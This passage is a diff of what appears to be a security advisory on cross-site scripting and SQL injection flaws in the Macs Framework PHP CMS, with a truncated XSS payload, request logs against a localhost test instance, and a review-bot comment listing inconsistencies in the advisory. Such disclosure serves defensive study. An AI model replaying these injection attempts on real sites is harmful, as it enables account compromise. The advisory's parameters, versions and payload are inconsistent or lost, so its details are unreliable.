+management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] deleteUser +[+] editRole + +Vulnerable Parameter(s): +[+] userId +[+] roleId + + +Proof of Concept (PoC): +======================= +Google Dork(s): intitle, subtitle & co. +Site Powered by Mac's PHP MVC Framework Framework of the future +Design downloaded from Zeroweb.org: Free website templates, layouts, and +tools. + + +1.1 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. 
+For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test"
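Review bot: section 1.3 contradicts itself on the request method: the prose says "The request method to inject or execute commands is GET" while the "Request Method(s)" list below it gives only "[+] POST"; pick one. The Vulnerable Parameter list names "emailAdress", but the PoC request body uses "emailAddress=", so the parameter list should be corrected to match the log. The product version and name are also inconsistent ("Macs Framework v1.14f" in the title and Affected Product(s) versus "Mac Framework v1.1.4f" in the abstract and technical details), and the "Authentication Type" header says restricted authentication is required while 1.1 states the XSS is exploitable "without user account"; the header should make clear that only the SQL injection in 1.3 needs a privileged account. Finally, the "PoC: Payload" line (`>">"`) appears to have lost its content in the paste, and there are several typos worth fixing ("Managament", "web-applicatio", "sesson", "passwort", "deletUser").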